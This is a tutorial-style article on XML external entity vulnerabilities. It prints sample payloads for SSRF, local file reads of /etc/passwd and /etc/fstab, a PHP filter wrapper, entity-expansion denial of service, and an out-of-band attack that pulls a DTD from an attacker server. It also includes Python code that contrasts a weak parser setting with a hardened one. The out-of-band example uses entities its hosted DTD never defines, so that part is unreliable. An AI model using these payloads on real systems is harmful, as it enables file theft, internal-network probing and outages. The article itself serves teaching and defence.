What are XXE vulnerabilities?

XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) occur when a web application or API accepts XML from an untrusted source and hands it to a back-end XML parser that is configured to resolve external entities. XXE vulnerabilities can let malicious hackers perform attacks such as server-side request forgery (SSRF), local file inclusion (LFI), directory traversal, remote code execution (RCE), network port scanning, and denial of service (DoS).

Example of XXE-based SSRF

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "http://192.168.0.1/secret.txt">
]>
<foo>
  &xxe;
</foo>

Example of XXE local data exfiltration

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "file:///etc/passwd">
]>
<foo>
  &xxe;
</foo>

Limitations and workarounds for exfiltrating XML data

POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "file:///etc/fstab">
]>
<foo>
  &bar;
</foo>

Using PHP protocol wrappers

POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
  &bar;
</foo>

Example of an XXE DoS attack

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
  Hello &t3;
</foo>
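How the parser switch described in the introduction plays out, as an added example that is not code from the original article: Python's standard-library xml.sax parser with external general entity resolution enabled (the weak setting) and disabled (the hardened one), run over a payload of the same shape as the file:///etc/passwd example but pointed at a temporary file created for the demo, and over the entity-expansion payload from the DoS example. The function names, the secret value and the DOCTYPE pre-check are assumptions of this example, not part of any library.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Entity-expansion payload taken from the DoS example on this page.
DOS_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
  Hello &t3;
</foo>
"""


class TextCollector(ContentHandler):
    """Collects the character data the parser delivers (what the app would use)."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts).strip()


def parse_untrusted_xml(data: bytes, resolve_external_entities: bool) -> str:
    """Return the text content of XML bytes.

    True = weak setting: the parser follows SYSTEM identifiers (file://, http://)
    from the DTD, which the SSRF and /etc/passwd payloads rely on.
    False = hardened setting (also the stdlib default since Python 3.8)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return handler.text


def parse_hardened(data: bytes) -> str:
    """Refuse any document carrying a DTD, then parse with externals off.

    Disabling external entities blocks file reads and SSRF but not the
    internal-entity expansion of the DoS payload; rejecting DOCTYPE stops both.
    (Byte check = fast pre-filter; run it on decoded text for UTF-16 input.)"""
    if b"<!DOCTYPE" in data:
        raise ValueError("DTD (DOCTYPE) not allowed in untrusted XML")
    return parse_untrusted_xml(data, resolve_external_entities=False)


def build_file_read_payload(path: str) -> bytes:
    """Same shape as the page's file:///etc/passwd payload, aimed at a path we own."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "  <!ELEMENT foo ANY>\n"
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        "<foo>&xxe;</foo>\n"
    ).encode("latin-1")


def demo() -> dict:
    """Run the payloads through each configuration and report what came back."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as fh:
            fh.write("CONSTRUCTED-SECRET-42")  # constructed stand-in for /etc/passwd
        payload = build_file_read_payload(secret_path)
        leaked = parse_untrusted_xml(payload, resolve_external_entities=True)
        blocked = parse_untrusted_xml(payload, resolve_external_entities=False)
        try:
            parse_hardened(payload)
            doctype_rejected = False
        except ValueError:
            doctype_rejected = True
    # Externals off does not stop internal expansion: t3 still yields 40 x "World ".
    expanded = parse_untrusted_xml(DOS_PAYLOAD, resolve_external_entities=False)
    return {
        "weak": leaked,                # secret file contents leak into the document
        "external_off": blocked,       # "": the entity reference was skipped
        "doctype_rejected": doctype_rejected,
        "dos_expansions": expanded.count("World"),
    }


if __name__ == "__main__":
    print(demo())
```

Turning external entity resolution off is what defeats the SSRF and file-read payloads above; in the stdlib parser the same callback also refuses external parameter entity (`%dtd;`) fetches, while other parsers expose that as a separate switch, so both need checking. It does nothing against internal entity expansion (the DoS payload still expands to 40 copies of "World "), which is why the hardened path rejects DOCTYPE outright: for XML from untrusted sources, disabling DTDs entirely is the simplest rule that covers every variant on this page.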

What is OOB XXE?

Out-of-band XML external entity (OOB XXE) vulnerabilities are a type of XXE vulnerability where the attacker does not receive an immediate response to the XXE payload. The attack is conducted using one channel, such as a direct HTTP request, while the results (such as sensitive files) are received through another channel – often an HTTP server controlled by the attacker.

Example of OOB XXE

evil.dtd (hosted on the attacker's HTTP server)

<!ENTITY evil SYSTEM "file:///etc/hosts">

XML request sent to the vulnerable application

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
  <!ENTITY file SYSTEM
  "file:///etc/hosts">
  <!ENTITY % dtd SYSTEM
  "http://192.168.9.52:8787/ctf_train/php/evil.dtd">
  <!ENTITY bar SYSTEM
  "php://filter/read=convert.base64-encode/resource=/etc/fstab">
  %dtd;
  %all;
]>
<root>
  <user>
    &file;
    &fileContents;
  </user>
</root>